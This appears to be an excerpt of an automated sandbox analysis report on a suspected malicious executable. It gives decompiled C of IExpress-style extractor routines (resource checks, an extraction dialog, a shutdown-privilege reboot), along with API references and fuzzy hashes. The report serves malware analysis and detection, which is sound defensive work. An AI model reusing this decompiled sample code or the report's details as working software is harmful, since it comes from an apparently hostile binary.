                                                                                                                                                                                                                                                0x010e5e77
                                                                                                                                                                                                                                                0x010e5e6e
                                                                                                                                                                                                                                                0x010e5e65
                                                                                                                                                                                                                                                0x010e5e5c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5dd0
                                                                                                                                                                                                                                                0x010e5dd0
                                                                                                                                                                                                                                                0x010e5dd0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5dd0
                                                                                                                                                                                                                                                0x010e5dce
                                                                                                                                                                                                                                                0x010e5dca
                                                                                                                                                                                                                                                0x010e5dba
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5d00
                                                                                                                                                                                                                                                0x010e5dd9
                                                                                                                                                                                                                                                0x010e5e04
                                                                                                                                                                                                                                                0x010e61fe
                                                                                                                                                                                                                                                0x010e5e0a
                                                                                                                                                                                                                                                0x010e5e0c
                                                                                                                                                                                                                                                0x010e5e17
                                                                                                                                                                                                                                                0x010e5e17
                                                                                                                                                                                                                                                0x010e5e04
                                                                                                                                                                                                                                                0x010e6200
                                                                                                                                                                                                                                                0x010e6200
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CharNextA.USER32(?,00000000,?,?), ref: 010E5CEE
                                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(010E8B3E,00000104,00000000,?,?), ref: 010E5DFC
                                                                                                                                                                                                                                                • CharUpperA.USER32(?), ref: 010E5E3E
                                                                                                                                                                                                                                                • CharUpperA.USER32(-00000052), ref: 010E5EE1
                                                                                                                                                                                                                                                • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 010E5F6F
                                                                                                                                                                                                                                                • CharUpperA.USER32(?), ref: 010E5FA7
                                                                                                                                                                                                                                                • CharUpperA.USER32(-0000004E), ref: 010E6008
                                                                                                                                                                                                                                                • CharUpperA.USER32(?), ref: 010E60AA
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,010E1140,00000000,00000040,00000000), ref: 010E61F1
                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 010E61F8
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                                                                • String ID: "$"$:$RegServer
                                                                                                                                                                                                                                                • API String ID: 1203814774-25366791
                                                                                                                                                                                                                                                • Opcode ID: 06a37dbc6bb3dd23bdb3db9383eb83fefdb1bab402b54d24f447a1368cf0905a
                                                                                                                                                                                                                                                • Instruction ID: 4d1d7668cb53b73fbf899846024cc30998f6d7bad23f86839eee7e095a2f5fe3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 06a37dbc6bb3dd23bdb3db9383eb83fefdb1bab402b54d24f447a1368cf0905a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 29D17035A082555EEFBA8A3F9C4C3FA3FF19B1530CF0849DAD5D6DA145D67689828F00
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E1F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94shutdownCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 60%
                                                                                                                                                                                                                                                			E010E1F90(signed int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				void* __ebx;
				signed int _t13;
				int _t21;
				void* _t25;
				int _t28;
				signed char _t30;
				void* _t38;
				void* _t40;
				void* _t41;
				signed int _t46;

				_t41 = __esi;
				_t38 = __edi;
				_t30 = __ecx;
				if((__ecx & 0x00000002) != 0) {
					L12:
					if((_t30 & 0x00000004) != 0) {
						L14:
						if( *0x10e9a40 != 0) {
							_pop(_t30);
							_t44 = _t46;
							_t13 =  *0x10e8004; // 0x71a8563c
							_v8 = _t13 ^ _t46;
							_push(_t38);
							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
								_v24.PrivilegeCount = 1;
								_v12 = 2;
								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
								CloseHandle(_v28);
								_t41 = _t41;
								_push(0);
								if(_t21 != 0) {
									if(ExitWindowsEx(2, ??) != 0) {
										_t25 = 1;
									} else {
										_t37 = 0x4f7;
										goto L3;
									}
								} else {
									_t37 = 0x4f6;
									goto L4;
								}
							} else {
								_t37 = 0x4f5;
								L3:
								_push(0);
								L4:
								_push(0x10);
								_push(0);
								_push(0);
								E010E44B9(0, _t37);
								_t25 = 0;
							}
							_pop(_t40);
							return E010E6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
						} else {
							_t28 = ExitWindowsEx(2, 0);
							goto L16;
						}
					} else {
						_t37 = 0x522;
						_t28 = E010E44B9(0, 0x522, 0x10e1140, 0, 0x40, 4);
						if(_t28 != 6) {
							goto L16;
						} else {
							goto L14;
						}
					}
				} else {
					__eax = E010E1EA7(__ecx);
					if(__eax != 2) {
						L16:
						return _t28;
					} else {
						goto L12;
					}
				}
			}

















                                                                                                                                                                                                                                                0x010e1f90
                                                                                                                                                                                                                                                0x010e1f90
                                                                                                                                                                                                                                                0x010e1f93
                                                                                                                                                                                                                                                0x010e1f98
                                                                                                                                                                                                                                                0x010e1fa4
                                                                                                                                                                                                                                                0x010e1fa7
                                                                                                                                                                                                                                                0x010e1fc5
                                                                                                                                                                                                                                                0x010e1fcd
                                                                                                                                                                                                                                                0x010e1fdb
                                                                                                                                                                                                                                                0x010e1ee5
                                                                                                                                                                                                                                                0x010e1eea
                                                                                                                                                                                                                                                0x010e1ef1
                                                                                                                                                                                                                                                0x010e1ef4
                                                                                                                                                                                                                                                0x010e1f0c
                                                                                                                                                                                                                                                0x010e1f2e
                                                                                                                                                                                                                                                0x010e1f3a
                                                                                                                                                                                                                                                0x010e1f46
                                                                                                                                                                                                                                                0x010e1f4d
                                                                                                                                                                                                                                                0x010e1f58
                                                                                                                                                                                                                                                0x010e1f60
                                                                                                                                                                                                                                                0x010e1f61
                                                                                                                                                                                                                                                0x010e1f62
                                                                                                                                                                                                                                                0x010e1f75
                                                                                                                                                                                                                                                0x010e1f80
                                                                                                                                                                                                                                                0x010e1f77
                                                                                                                                                                                                                                                0x010e1f77
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e1f77
                                                                                                                                                                                                                                                0x010e1f64
                                                                                                                                                                                                                                                0x010e1f64
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e1f64
                                                                                                                                                                                                                                                0x010e1f0e
                                                                                                                                                                                                                                                0x010e1f0e
                                                                                                                                                                                                                                                0x010e1f13
                                                                                                                                                                                                                                                0x010e1f13
                                                                                                                                                                                                                                                0x010e1f14
                                                                                                                                                                                                                                                0x010e1f14
                                                                                                                                                                                                                                                0x010e1f16
                                                                                                                                                                                                                                                0x010e1f17
                                                                                                                                                                                                                                                0x010e1f1a
                                                                                                                                                                                                                                                0x010e1f1f
                                                                                                                                                                                                                                                0x010e1f1f
                                                                                                                                                                                                                                                0x010e1f86
                                                                                                                                                                                                                                                0x010e1f8f
                                                                                                                                                                                                                                                0x010e1fcf
                                                                                                                                                                                                                                                0x010e1fd3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e1fd3
                                                                                                                                                                                                                                                0x010e1fa9
                                                                                                                                                                                                                                                0x010e1fb4
                                                                                                                                                                                                                                                0x010e1fbb
                                                                                                                                                                                                                                                0x010e1fc3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e1fc3
                                                                                                                                                                                                                                                0x010e1f9a
                                                                                                                                                                                                                                                0x010e1f9a
                                                                                                                                                                                                                                                0x010e1fa2
                                                                                                                                                                                                                                                0x010e1fd9
                                                                                                                                                                                                                                                0x010e1fda
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e1fa2

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 010E1EFB
                                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 010E1F02
                                                                                                                                                                                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 010E1FD3
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                                                                • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                • API String ID: 2795981589-3733053543
                                                                                                                                                                                                                                                • Opcode ID: 9d9aa912a8c6d53c284000c2961bcedb2787d103bde2a9ed8146bc52327a2729
                                                                                                                                                                                                                                                • Instruction ID: f1085c14d9b5bb200b842003d64a3963fad5068585b62586bb81ad08b2ea23ca
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9d9aa912a8c6d53c284000c2961bcedb2787d103bde2a9ed8146bc52327a2729
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1021D6B1B40205AEDB305AA79C4DFBF7AF8EB99B51F100059FA82DA185D779C80183A1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E6CF0 Relevance: 6.0, APIs: 4, Instructions: 13COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E010E6CF0(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



                                                                                                                                                                                                                                                0x010e6cf7
                                                                                                                                                                                                                                                0x010e6d00
                                                                                                                                                                                                                                                0x010e6d19

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,010E6E26,010E1000), ref: 010E6CF7
                                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(010E6E26,?,010E6E26,010E1000), ref: 010E6D00
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409,?,010E6E26,010E1000), ref: 010E6D0B
                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,?,010E6E26,010E1000), ref: 010E6D12
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3231755760-0
                                                                                                                                                                                                                                                • Opcode ID: 4256383c90560ef298ee571f180b28767e999ef690b8cbd7222af590c038e8df
                                                                                                                                                                                                                                                • Instruction ID: 134a8639d65a58b90c3bf0469e1580467ebce5c6cc1869e1ed42b328be7a0bd5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4256383c90560ef298ee571f180b28767e999ef690b8cbd7222af590c038e8df
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 94D0C932200108FBDB202BE2E80CA593FA8EB8DA92F454085F3598B004CA3BC4518B51
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E3210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 76%
                                                                                                                                                                                                                                                			E010E3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __edi;
				void* _t6;
				void* _t10;
				int _t20;
				int _t21;
				int _t23;
				char _t24;
				long _t25;
				int _t27;
				int _t30;
				void* _t32;
				int _t33;
				int _t34;
				int _t37;
				int _t38;
				int _t39;
				void* _t42;
				void* _t46;
				CHAR* _t49;
				void* _t58;
				void* _t63;
				struct HWND__* _t64;

				_t64 = _a4;
				_t6 = _a8 - 0x10;
				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100;
				if(_t10 == 0) {
					E010E43D0(_t64, GetDesktopWindow());
					SetWindowTextA(_t64, "lenta");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
					__eflags =  *0x10e9a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0);
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) {
					_t20 = _a12 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0x10e91e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L25:
							E010E44B9(_t64, _t58);
							goto L39;
						}
						_t49 = 0x10e91e4;
						do {
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0x10e91e5 - 3;
						if(_t49 - 0x10e91e5 < 3) {
							goto L32;
						}
						_t24 =  *0x10e91e5; // 0x3a
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0x10e91e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E010E658A(0x10e91e4, 0x104, 0x10e1140);
								_t27 = E010E58C8(0x10e91e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0x10e91e4 - 0x5c;
									if( *0x10e91e4 != 0x5c) {
										L30:
										_t30 = E010E597D(0x10e91e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0x10e91e5 - 0x5c;
									if( *0x10e91e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E010E44B9(_t64, 0x54a, 0x10e91e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0x10e91e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0x10e91e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0x10e91e4 - 0x5c;
						if( *0x10e91e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0x10e9124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0x10e9a3c, 0x3e8, 0x10e8598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E010E4224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0x10e87a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E010E44B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}

























                                                                                                                                                                                                                                                0x010e321b
                                                                                                                                                                                                                                                0x010e321e
                                                                                                                                                                                                                                                0x010e3221
                                                                                                                                                                                                                                                0x010e343c
                                                                                                                                                                                                                                                0x010e343e
                                                                                                                                                                                                                                                0x010e343f
                                                                                                                                                                                                                                                0x010e3445
                                                                                                                                                                                                                                                0x010e3447
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3447
                                                                                                                                                                                                                                                0x010e3229
                                                                                                                                                                                                                                                0x010e322a
                                                                                                                                                                                                                                                0x010e322f
                                                                                                                                                                                                                                                0x010e33ec
                                                                                                                                                                                                                                                0x010e33f7
                                                                                                                                                                                                                                                0x010e3410
                                                                                                                                                                                                                                                0x010e3416
                                                                                                                                                                                                                                                0x010e341d
                                                                                                                                                                                                                                                0x010e342d
                                                                                                                                                                                                                                                0x010e342d
                                                                                                                                                                                                                                                0x010e3438
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3438
                                                                                                                                                                                                                                                0x010e3237
                                                                                                                                                                                                                                                0x010e3243
                                                                                                                                                                                                                                                0x010e3243
                                                                                                                                                                                                                                                0x010e3246
                                                                                                                                                                                                                                                0x010e32ee
                                                                                                                                                                                                                                                0x010e32f4
                                                                                                                                                                                                                                                0x010e32f6
                                                                                                                                                                                                                                                0x010e33d4
                                                                                                                                                                                                                                                0x010e33d6
                                                                                                                                                                                                                                                0x010e33db
                                                                                                                                                                                                                                                0x010e33dc
                                                                                                                                                                                                                                                0x010e33de
                                                                                                                                                                                                                                                0x010e33df
                                                                                                                                                                                                                                                0x010e3370
                                                                                                                                                                                                                                                0x010e3372
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3372
                                                                                                                                                                                                                                                0x010e32fc
                                                                                                                                                                                                                                                0x010e3301
                                                                                                                                                                                                                                                0x010e3301
                                                                                                                                                                                                                                                0x010e3303
                                                                                                                                                                                                                                                0x010e3304
                                                                                                                                                                                                                                                0x010e3304
                                                                                                                                                                                                                                                0x010e330a
                                                                                                                                                                                                                                                0x010e330d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3313
                                                                                                                                                                                                                                                0x010e3318
                                                                                                                                                                                                                                                0x010e331a
                                                                                                                                                                                                                                                0x010e3331
                                                                                                                                                                                                                                                0x010e3332
                                                                                                                                                                                                                                                0x010e333a
                                                                                                                                                                                                                                                0x010e333d
                                                                                                                                                                                                                                                0x010e337c
                                                                                                                                                                                                                                                0x010e3388
                                                                                                                                                                                                                                                0x010e338f
                                                                                                                                                                                                                                                0x010e3394
                                                                                                                                                                                                                                                0x010e3396
                                                                                                                                                                                                                                                0x010e33a4
                                                                                                                                                                                                                                                0x010e33ab
                                                                                                                                                                                                                                                0x010e33b6
                                                                                                                                                                                                                                                0x010e33be
                                                                                                                                                                                                                                                0x010e33c3
                                                                                                                                                                                                                                                0x010e33c5
                                                                                                                                                                                                                                                0x010e3435
                                                                                                                                                                                                                                                0x010e3437
                                                                                                                                                                                                                                                0x010e3437
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3437
                                                                                                                                                                                                                                                0x010e33c7
                                                                                                                                                                                                                                                0x010e33c9
                                                                                                                                                                                                                                                0x010e33cc
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e33cc
                                                                                                                                                                                                                                                0x010e33ad
                                                                                                                                                                                                                                                0x010e33b4
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e33b4
                                                                                                                                                                                                                                                0x010e3398
                                                                                                                                                                                                                                                0x010e3399
                                                                                                                                                                                                                                                0x010e339b
                                                                                                                                                                                                                                                0x010e339c
                                                                                                                                                                                                                                                0x010e339d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e339d
                                                                                                                                                                                                                                                0x010e334c
                                                                                                                                                                                                                                                0x010e3351
                                                                                                                                                                                                                                                0x010e3354
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e335c
                                                                                                                                                                                                                                                0x010e3362
                                                                                                                                                                                                                                                0x010e3364
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3366
                                                                                                                                                                                                                                                0x010e3367
                                                                                                                                                                                                                                                0x010e3369
                                                                                                                                                                                                                                                0x010e336a
                                                                                                                                                                                                                                                0x010e336b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e336b
                                                                                                                                                                                                                                                0x010e331c
                                                                                                                                                                                                                                                0x010e3323
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3329
                                                                                                                                                                                                                                                0x010e332b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e332b
                                                                                                                                                                                                                                                0x010e324c
                                                                                                                                                                                                                                                0x010e324c
                                                                                                                                                                                                                                                0x010e324f
                                                                                                                                                                                                                                                0x010e32c8
                                                                                                                                                                                                                                                0x010e32ce
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e32ce
                                                                                                                                                                                                                                                0x010e3251
                                                                                                                                                                                                                                                0x010e3256
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3271
                                                                                                                                                                                                                                                0x010e3277
                                                                                                                                                                                                                                                0x010e3279
                                                                                                                                                                                                                                                0x010e3298
                                                                                                                                                                                                                                                0x010e329d
                                                                                                                                                                                                                                                0x010e329f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e32b0
                                                                                                                                                                                                                                                0x010e32b6
                                                                                                                                                                                                                                                0x010e32b8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e32be
                                                                                                                                                                                                                                                0x010e3280
                                                                                                                                                                                                                                                0x010e3289
                                                                                                                                                                                                                                                0x010e328e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e328e
                                                                                                                                                                                                                                                0x010e327b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e327b
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadStringA.USER32(000003E8,010E8598,00000200), ref: 010E3271
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 010E33E2
                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,lenta), ref: 010E33F7
                                                                                                                                                                                                                                                • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 010E3410
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000836), ref: 010E3426
                                                                                                                                                                                                                                                • EnableWindow.USER32(00000000), ref: 010E342D
                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000000), ref: 010E343F
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$lenta
                                                                                                                                                                                                                                                • API String ID: 2418873061-1872994565
                                                                                                                                                                                                                                                • Opcode ID: 145b4d2bdf9ffb034c02ce211f3fddbffdfc3fd4da29a022d9a17e58b1c0d5f1
                                                                                                                                                                                                                                                • Instruction ID: 1fa387ff40097ebe925d4292f55383f98a591a15c6cc6a97118c38790048bd7e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 145b4d2bdf9ffb034c02ce211f3fddbffdfc3fd4da29a022d9a17e58b1c0d5f1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C951B370341240AEE7725A3B5C4CFBF6DD9BB89B54F4080A9F6C59F2C5CEA9D8019361
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E2CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183synchronizationCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E010E2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t20;
				void* _t23;
				void* _t27;
				struct HRSRC__* _t31;
				intOrPtr _t33;
				void* _t43;
				void* _t48;
				signed int _t65;
				struct HINSTANCE__* _t66;
				signed int _t67;

				_t13 =  *0x10e8004; // 0x71a8563c
				_v8 = _t13 ^ _t67;
				_t65 = 0;
				_t66 = __ecx;
				_t48 = __edx;
				 *0x10e9a3c = __ecx;
				memset(0x10e9140, 0, 0x8fc);
				memset(0x10e8a20, 0, 0x32c);
				memset(0x10e88c0, 0, 0x104);
				 *0x10e93ec = 1;
				_t20 = E010E468F("TITLE", 0x10e9154, 0x7f);
				if(_t20 == 0 || _t20 > 0x80) {
					_t64 = 0x4b1;
					goto L32;
				} else {
					_t27 = CreateEventA(0, 1, 1, 0);
					 *0x10e858c = _t27;
					SetEvent(_t27);
					_t64 = 0x10e9a34;
					if(E010E468F("EXTRACTOPT", 0x10e9a34, 4) != 0) {
						if(( *0x10e9a34 & 0x000000c0) == 0) {
							L12:
							 *0x10e9120 =  *0x10e9120 & _t65;
							if(E010E5C9E(_t48, _t48, _t65, _t66) != 0) {
								if( *0x10e8a3a == 0) {
									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
									if(_t31 != 0) {
